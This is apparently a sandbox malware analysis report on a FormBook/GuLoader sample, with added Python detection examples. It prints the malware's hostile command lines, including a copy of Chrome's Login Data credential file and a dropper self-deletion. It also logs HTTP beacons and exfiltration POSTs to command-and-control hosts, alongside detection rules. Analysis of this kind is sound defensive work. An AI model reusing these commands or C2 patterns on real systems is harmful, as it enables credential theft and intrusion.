Analysis Report sample.exe

Overview

General Information

Sample Name: sample.exe
MD5: 178d06da82a097ab37a7423726fb2819
SHA1: 31540af8d936241bd20d41599e17c80090906e2d
SHA256: 59b75c1a0a646cabb9c69e981dc95985d9feb3ee1e3f7c3c0ace8165037ed006

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
GuLoader behavior detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential malicious icon found
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • sample.exe (PID: 5880 cmdline: 'C:\Users\user\Desktop\sample.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
    • sample.exe (PID: 1824 cmdline: 'C:\Users\user\Desktop\sample.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
      • Dynamitbom9.exe (PID: 5100 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
        • Dynamitbom9.exe (PID: 4316 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
          • explorer.exe (PID: 2864 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
            • ipconfig.exe (PID: 3760 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
              • cmd.exe (PID: 4392 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
                • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cmd.exe (PID: 3008 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
                • conhost.exe (PID: 2960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • mstsc.exe (PID: 6084 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 1F73D52590D1EDF803FD49EAF32ADC2E)
            • wscript.exe (PID: 6088 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
            • uli4tpdsdi4.exe (PID: 5124 cmdline: C:\Program Files (x86)\Crxedyxtx\uli4tpdsdi4.exe MD5: 178D06DA82A097AB37A7423726FB2819)
              • uli4tpdsdi4.exe (PID: 5252 cmdline: C:\Program Files (x86)\Crxedyxtx\uli4tpdsdi4.exe MD5: 178D06DA82A097AB37A7423726FB2819)
                • Dynamitbom9.exe (PID: 5944 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
                  • Dynamitbom9.exe (PID: 5796 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
            • uli4tpdsdi4.exe (PID: 3488 cmdline: 'C:\Program Files (x86)\Crxedyxtx\uli4tpdsdi4.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
              • uli4tpdsdi4.exe (PID: 780 cmdline: 'C:\Program Files (x86)\Crxedyxtx\uli4tpdsdi4.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
            • systray.exe (PID: 1136 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
  • wscript.exe (PID: 5372 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • Dynamitbom9.exe (PID: 4548 cmdline: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe MD5: 178D06DA82A097AB37A7423726FB2819)
      • Dynamitbom9.exe (PID: 700 cmdline: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe MD5: 178D06DA82A097AB37A7423726FB2819)
  • wscript.exe (PID: 5912 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • Dynamitbom9.exe (PID: 5796 cmdline: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe MD5: 178D06DA82A097AB37A7423726FB2819)
      • Dynamitbom9.exe (PID: 4476 cmdline: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe MD5: 178D06DA82A097AB37A7423726FB2819)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000003.1191688062.0000028DD6606000.00000004.00000001.sdmp | SUSP_LNK_SuspiciousCommands | Detects LNK file with suspicious content | Florian Roth
  • 0xcd4c:$s12: WScript.Shell
0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x157b9:$sqlite3step: 68 34 1C 7B E1
  • 0x158cc:$sqlite3step: 68 34 1C 7B E1
  • 0x157e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1590d:$sqlite3text: 68 38 2A 90 C5
  • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000002.2392368169.000000000040D000.00000020.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x1ee0:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
(74 memory-dump entries in total; only the first are listed here)

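The three $sqlite3* strings of the JPCERT/CC Formbook rule above are each the x86 encoding of `push imm32` (opcode 68) followed by a 32-bit little-endian constant, which is why the rule can match them as fixed bytes anywhere in a dump. The scan below pulls every such push out of a memory image and reports the offsets at which the rule's constants occur, the same way the table above lists them. This is an added example, not the rule itself or anything produced by the report: the memory image it scans is constructed, and the rule's own string names are the only source used for what the constants denote (the names suggest identifiers for the sqlite3 step/column_text/column_blob calls used to read browser databases, but that reading is an inference, not something the report states).

```python
"""Locate the JPCERT/CC Formbook rule's push-immediate strings in a memory dump.
Added example; DUMP is a constructed buffer, not a dump from the report."""
import struct


def push_imm32(imm: int) -> bytes:
    """x86 `push imm32`: opcode 0x68 plus the constant in little-endian order."""
    return b"\x68" + struct.pack("<I", imm)


# Constants encoded by the rule strings: 68 34 1C 7B E1 -> 0xE17B1C34, and so on.
RULE_STRINGS = {
    "sqlite3step": 0xE17B1C34,
    "sqlite3text": 0xC5902A38,
    "sqlite3blob": 0x8C7FD853,
}

# Constructed memory image: each constant pushed once and followed by `call eax`
# (FF D0), padded with NOPs, plus one unrelated push that must not match.
DUMP = (b"\x90" * 16 + push_imm32(0xE17B1C34) + b"\xff\xd0"
        + b"\x90" * 8 + push_imm32(0xC5902A38) + b"\xff\xd0"
        + b"\x90" * 8 + push_imm32(0x8C7FD853) + b"\xff\xd0"
        + push_imm32(0x44434241))


def push_sites(buf: bytes):
    """(offset, imm32) for every 0x68 byte that has four bytes after it.
    A byte scan like a Yara string match, not a disassembly: a 0x68 that is
    really an operand of another instruction is reported as well."""
    return [(off, struct.unpack_from("<I", buf, off + 1)[0])
            for off in range(len(buf) - 4) if buf[off] == 0x68]


def match_rule(buf: bytes, strings=RULE_STRINGS):
    """Offsets of each named rule string in buf, and whether all were found.
    Requiring all three is this example's choice; check the rule's own
    condition before treating a partial hit as a miss."""
    wanted = {imm: name for name, imm in strings.items()}
    hits = {}
    for off, imm in push_sites(buf):
        if imm in wanted:
            hits.setdefault(wanted[imm], []).append(off)
    return hits, all(name in hits for name in strings)


def main():
    hits, complete = match_rule(DUMP)
    for name, offs in hits.items():
        print(f"{name}: " + ", ".join(f"0x{o:x}" for o in offs))
    print("all rule strings present:", complete)


if __name__ == "__main__":
    main()
```

Run against a real dump (for instance the `.sdmp` region named in the table) the same scan yields every pushed constant, not just the three listed, which is a quick way to collect the full set of values a sample pushes before resolving imports.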
Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started
Author: Joe Security
Data:
  Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\cmd.exe
  NewProcessName: C:\Windows\SysWOW64\cmd.exe
  OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: C:\Windows\SysWOW64\ipconfig.exe
  ParentImage: C:\Windows\SysWOW64\ipconfig.exe
  ParentProcessId: 3760
  ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  ProcessId: 3008

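The Sigma match above and the process tree in the Startup section, checked by a few process-creation rules: the Login Data copy the Sigma rule fires on, the dropper deleting its own copy from %TEMP%, a shell spawned by ipconfig.exe, and SysWOW64 system binaries started by explorer.exe with nothing but their own path as command line. This is an added example, not Joe Sandbox's rule engine and not the Sigma rule's own YAML; the events are constructed from the tree and the event fields above (explorer.exe's image path is assumed, since the report shows no command line for it), and the list of injection hosts is simply the three SysWOW64 binaries seen in this run, so it needs tuning before use elsewhere.

```python
"""Process-start triage over events constructed from the Startup tree above.
Added example; EVENTS are hand-built from the report, not exported from it."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


T = r"C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe"
EVENTS = [
    Proc(5880, 0, r"C:\Users\user\Desktop\sample.exe", r"'C:\Users\user\Desktop\sample.exe'"),
    Proc(1824, 5880, r"C:\Users\user\Desktop\sample.exe", r"'C:\Users\user\Desktop\sample.exe'"),
    Proc(5100, 1824, T, f"'{T}'"),
    Proc(4316, 5100, T, f"'{T}'"),
    Proc(2864, 4316, r"C:\Windows\explorer.exe", ""),  # image path assumed; report shows none
    Proc(3760, 2864, r"C:\Windows\SysWOW64\ipconfig.exe", r"C:\Windows\SysWOW64\ipconfig.exe"),
    Proc(4392, 3760, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{T}'"),
    Proc(3008, 3760, r"C:\Windows\SysWOW64\cmd.exe",
         r"/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' "
         r"'C:\Users\user\AppData\Local\Temp\DB1' /V"),
    Proc(6084, 2864, r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Windows\SysWOW64\mstsc.exe"),
    Proc(1136, 2864, r"C:\Windows\SysWOW64\systray.exe", r"C:\Windows\SysWOW64\systray.exe"),
]

SHELLS = {"cmd.exe", "powershell.exe"}
# Hosts FormBook injected into in this run; a tuning list, not a complete one (assumption).
INJECTION_HOSTS = {"ipconfig.exe", "mstsc.exe", "systray.exe"}
CHROME_LOGIN_DATA = r"\google\chrome\user data\default\login data"
TEMP_PE_DELETE = re.compile(r"/c\s+del\s+'?[^']*\\appdata\\local\\temp\\[^']*\.exe", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (rule, pid, ...) tuples for every event a rule fires on."""
    by_pid = {p.pid: p for p in events}
    findings = []
    for p in events:
        img, cl = basename(p.image), p.cmdline.lower()
        parent = by_pid.get(p.ppid)
        # The Sigma event above: cmd.exe copying Chrome's Login Data SQLite file.
        if img == "cmd.exe" and "copy" in cl and CHROME_LOGIN_DATA in cl:
            findings.append(("chrome_login_data_copy", p.pid))
        # The dropper removing its own %TEMP% copy once it has relocated.
        if img == "cmd.exe" and TEMP_PE_DELETE.search(p.cmdline):
            findings.append(("self_delete_temp_pe", p.pid))
        # A shell whose parent is a utility that has no business spawning one.
        if img in SHELLS and parent and basename(parent.image) in INJECTION_HOSTS:
            findings.append(("shell_from_injection_host", p.pid, basename(parent.image)))
        # Heuristic: a SysWOW64 binary started by explorer.exe with a bare path
        # as its whole command line, the shape of the injection hosts above.
        if (parent and basename(parent.image) == "explorer.exe"
                and "\\syswow64\\" in p.image.lower()
                and p.cmdline.strip().lower() == p.image.lower()):
            findings.append(("bare_syswow64_child_of_explorer", p.pid))
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The parent check is what separates the two cmd.exe events from ordinary user activity: a copy of Login Data launched by a shell under explorer.exe is suspicious, but one launched by ipconfig.exe has no benign explanation at all, which is the parent relationship the Sigma event records in ParentImage.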
Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: sample.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Avira: detection malicious, Label: HEUR/AGEN.1043318
Source: C:\Users\user\AppData\Local\Temp\Crxedyxtx\uli4tpdsdi4.exe | Avira: detection malicious, Label: HEUR/AGEN.1043318
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Crxedyxtx\uli4tpdsdi4.exe | VirusTotal: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | VirusTotal: Detection: 44%
Multi AV Scanner detection for submitted file
Source: sample.exe | VirusTotal: Detection: 44%
Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1393568430.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.2650110342.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1400210571.0000000000090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1403442644.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1354802590.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1372935393.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1400130496.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1395541115.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2645870331.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2651453011.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.sample.exe.2430000.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 31.2.uli4tpdsdi4.exe.2450000.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 32.2.uli4tpdsdi4.exe.2470000.0.unpack | Avira: Label: TR/Dropper.Gen

Networking:

Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: www.wangrunjs.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.thecleanroomdoctor.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.3-333i000000x01-virus.net, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.astorianholding.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.tshop688.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.onenationrescue.info, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.khariddary.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.ecuagalaxyradio.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.backdroppr.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.hakuyousya.design, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.parniterablend.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.karljacobphotography.com, reply code: 3 (Name Error, NXDOMAIN)
Source: global traffic | HTTP traffic detected: GET /la8/?8po=2xb78DdDEjM3dlhHAL8WnJaCWoUJjTl6z61ZhAZlGEen8KRUhO+jiP2BW1Rd3dy3qp7J&pJE=0PUX56wpFRW HTTP/1.1 | Host: www.skinessenceparadise.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /la8/?8po=BCnuU+Adz6Y2RGA7NbUb+8TCvCHQh5V6jbe9cKk+/8jR+xdU1m6ihAfp69aseyTDC6/r&pJE=0PUX56wpFRW HTTP/1.1 | Host: www.mansiobok3.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /la8/?8po=VlwaRMNinHTL3n/MIazSEXRtTNo7NjMY9TLzowT7dmWR/3/ZlIsT4/UKlCxCKApsqzIr&pJE=0PUX56wpFRW HTTP/1.1 | Host: www.pappinlawoffice.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /la8/?8po=+iBiWgsd5uRCkihNyv5YpeyizloqSo7JCMLz9O439Lw1296fjgRjrTPbhHCe7wMr0Xfu&pJE=0PUX56wpFRW HTTP/1.1 | Host: www.energyccm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 184.168.221.38
Source: Joe Sandbox View | IP Address: 184.168.221.38
Source: Joe Sandbox View | ASN Name: unknown
Source: Joe Sandbox View | ASN Name: unknown
Source: Joe Sandbox View | ASN Name: unknown
    Source: global trafficHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.mansiobok3.infoConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mansiobok3.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mansiobok3.info/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 4a 67 72 55 4b 59 34 61 7e 2d 39 41 4f 58 46 6c 4e 74 77 41 6b 35 33 51 67 41 54 58 33 4c 68 54 32 75 6e 38 42 74 55 46 6f 38 43 56 77 67 5a 33 33 32 54 67 6c 57 53 58 6f 64 44 32 63 6e 28 31 4a 5a 4b 68 64 6f 33 39 45 6c 49 44 43 41 38 4b 4e 6c 51 6c 36 6c 5a 69 4c 39 76 57 58 55 45 66 47 6b 68 4b 76 35 34 4b 68 62 73 52 68 53 33 51 64 72 66 45 49 32 6e 65 63 77 4b 42 67 38 63 57 58 41 53 42 30 75 31 6c 70 6d 61 6d 6d 48 31 64 66 38 4d 2d 7a 62 32 48 6e 4c 44 53 31 72 54 51 54 6c 39 33 7a 47 6b 4d 74 76 50 62 51 52 76 4f 69 33 4d 6a 35 34 77 6a 38 56 36 5a 49 6a 4b 6f 67 63 36 45 79 46 31 61 54 45 56 4b 33 48 4d 4d 64 4f 57 46 4b 44 6a 73 4a 31 6d 53 49 69 56 4b 41 5a 71 78 50 2d 53 6a 32 6e 58 6c 44 4d 30 59 68 5a 45 6e 55 67 66 71 38 48 49 42 6c 54 32 70 7e 4d 42 48 70 4b 6a 46 43 63 70 71 4f 57 4d 4d 6c 70 79 59 61 49 41 51 53 68 39 69 71 68 67 77 59 53 6f 79 67 67 61 4c 41 76 31 6b 4b 73 44 47 55 6c 41 63 33 34 30 71 4f 5f 43 45 46 31 48 79 31 7a 6d 38 50 78 6c 77 5a 54 38 59 62 78 59 72 46 67 72 67 75 4a 4e 73 55 61 7e 42 55 58 34 75 6b 6c 41 76 44 30 48 58 34 48 78 76 6b 53 50 38 6d 75 59 65 67 4b 71 44 28 43 28 41 56 70 37 64 7a 57 70 78 44 31 69 76 4f 4d 6c 7a 7e 30 49 34 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
8po=JgrUKY4a~-9AOXFlNtwAk53QgATX3LhT2un8BtUFo8CVwgZ332TglWSXodD2cn(1JZKhdo39ElIDCA8KNlQl6lZiL9vWXUEfGkhKv54KhbsRhS3QdrfEI2necwKBg8cWXASB0u1lpmammH1df8M-zb2HnLDS1rTQTl93zGkMtvPbQRvOi3Mj54wj8V6ZIjKogc6EyF1aTEVK3HMMdOWFKDjsJ1mSIiVKAZqxP-Sj2nXlDM0YhZEnUgfq8HIBlT2p~MBHpKjFCcpqOWMMlpyYaIAQSh9iqhgwYSoyggaLAv1kKsDGUlAc340qO_CEF1Hy1zm8PxlwZT8YbxYrFgrguJNsUa~BUX4uklAvD0HX4HxvkSP8muYegKqD(C(AVp7dzWpxD1ivOMlz~0I4BA).
    Source: global trafficHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.mansiobok3.infoConnection: closeContent-Length: 138317Cache-Control: no-cacheOrigin: http://www.mansiobok3.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mansiobok3.info/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 4a 67 72 55 4b 5a 68 72 34 4f 35 52 4b 68 52 75 66 4c 42 73 38 4b 7a 53 6c 48 6a 36 73 49 78 39 28 64 53 37 42 70 51 42 30 39 54 4d 36 6a 52 33 31 30 4c 6e 73 57 53 55 71 64 44 33 4e 58 37 4e 4b 4b 62 69 64 73 6e 62 45 6c 42 56 4a 68 4d 50 4e 56 51 32 38 46 56 65 61 4e 4c 4e 58 57 41 41 48 42 5a 6f 36 4a 30 4b 6b 72 45 58 39 44 6d 57 61 75 76 4c 42 6d 37 58 65 79 4b 69 67 4f 6f 69 57 69 75 6a 69 38 42 6e 74 56 47 68 34 7a 78 31 4a 39 45 78 35 76 66 4e 37 59 28 42 32 49 47 5a 66 45 39 5f 28 6e 6b 44 33 66 57 61 62 32 44 38 70 6d 35 66 7e 35 41 4e 38 53 66 73 53 43 32 44 78 50 65 79 77 55 49 50 47 67 4e 49 72 6b 56 4d 4c 39 7e 34 48 69 53 32 57 67 61 33 4e 79 35 62 48 66 75 68 52 76 4c 62 31 57 62 70 49 64 6f 67 67 71 6f 76 57 67 44 56 31 6b 59 57 76 6a 57 68 79 75 73 6f 78 4b 69 52 52 4d 70 74 47 32 63 65 6a 61 65 54 64 5a 77 2d 53 69 4e 4c 78 67 4d 70 55 77 63 48 39 52 61 34 4e 39 6c 53 42 36 48 79 52 30 45 48 78 49 52 43 4b 5f 44 61 4b 58 76 70 31 7a 6d 4b 50 31 4a 57 5a 68 41 59 4b 78 34 34 43 44 44 38 73 4a 4d 77 54 4d 65 48 50 55 73 2d 6b 6c 59 76 53 57 50 74 71 45 52 76 68 45 44 39 6d 4e 41 65 73 61 71 44 33 69 7e 76 65 35 4f 6e 39 47 6f 38 44 58 32 46 52 4e 6b 74 7a 46 70 54 58 4e 57 79 58 4c 6a 50 51 2d 42 35 4f 6a 32 77 4a 77 64 39 73 5a 46 6b 49 4c 4a 4f 52 79 56 61 4d 70 5a 44 63 73 46 41 48 37 68 6f 65 78 37 68 78 35 61 71 55 4a 57 46 56 66 78 50 28 37 30 54 64 43 43 42 68 31 49 56 6a 4a 33 33 74 6b 6a 76 39 6f 39 76 46 51 39 67 49 4c 70 70 69 68 54 55 75 48 35 77 56 63 36 6b 6e 38 4d 47 77 42 44 4a 32 6a 69 6c 77 
66 75 38 53 33 45 63 49 39 28 63 4f 59 78 42 70 72 47 7a 38 70 57 69 59 77 62 48 7a 44 48 62 64 46 56 7a 69 72 61 46 68 73 6a 71 33 46 77 63 6e 73 35 32 34 33 4c 74 48 49 67 56 7a 44 33 6b 55 76 35 43 57 2d 73 68 50 48 53 64 35 65 4c 55 4d 43 53 57 7e 4b 77 31 79 65 33 36 28 39 57 43 4b 41 67 6e 78 75 4e 5a 6e 68 45 46 6d 78 33 4c 67 7a 4d 34 55 52 45 4b 42 36 4e 33 79 38 77 49 64 6c 62 4a 5a 31 6d 31 5a 42 76 31 33 4d 57 66 41 34 6a 53 4a 62 6b 39 47 5f 70 34 58 4f 6d 35 6a 63 6a 32 78 44 67 53 59 5f 30 50 4c 49 69 52 31 6a 52 68 59 4a 32 36 78 4a 35 31 32 37 31 71 50 64 62 69 55 4a 54 36 62 75 4e 6b 68 36 4c 74 49 71 50 61 4f 4d 52 31 28 57 56 4b 77 79 61 6f 4e 4d 4e 49 65 79 35 77 51 75 50 48 38 45 7a 7a 46 48 47 53 4e 78 6d 58 65 66 47 30 33 66 77 42 75 2d 54 5a 56 68 78 77 6c 79 48 45 64 4b 4d 71 46 34 76 74 64 7a 57 5a 4f 4f 68 78 72 64 4d 39 70 39 7e 4e 6d 52 4b 54 64 30 57 48 5a 49 79 58 35 43 68 2d 32 53 75 41 6c 4a 6c 55 6b 48 31 37 58 6d 48 7a 63 70 49 35 42 35 56 5f 47 2d 38 6c 37 72 79 5a 73 5f 53 7
    Source: global trafficHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.pappinlawoffice.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.pappinlawoffice.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pappinlawoffice.com/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 64 48 38 67 50 72 45 46 36 43 6d 36 33 47 47 6c 64 66 53 46 58 48 68 57 56 34 30 46 62 44 6f 36 6e 6b 65 73 74 51 50 33 55 30 36 30 33 45 76 43 6b 34 6c 38 36 4b 52 45 79 79 31 31 4a 79 46 61 68 6b 52 46 4a 71 57 4b 7e 79 6f 41 6a 2d 56 47 4e 71 65 50 7a 45 6c 68 38 41 49 71 61 39 78 52 42 5f 58 56 41 49 6e 71 39 38 53 51 45 76 47 6e 46 68 28 6d 34 34 55 62 4e 52 64 59 71 71 48 69 79 4e 76 64 41 58 58 52 77 74 39 68 47 37 49 77 66 4d 44 73 7e 6e 68 78 66 5a 70 6d 7e 6e 73 6e 43 46 32 6a 53 54 65 6c 4a 69 76 39 79 76 74 53 49 69 77 4b 58 56 77 73 4e 4a 47 4a 32 39 6f 51 43 5a 63 43 63 43 28 37 53 4e 36 77 4d 6b 63 4a 74 33 64 68 56 31 57 44 7e 58 64 4f 77 54 62 41 31 42 61 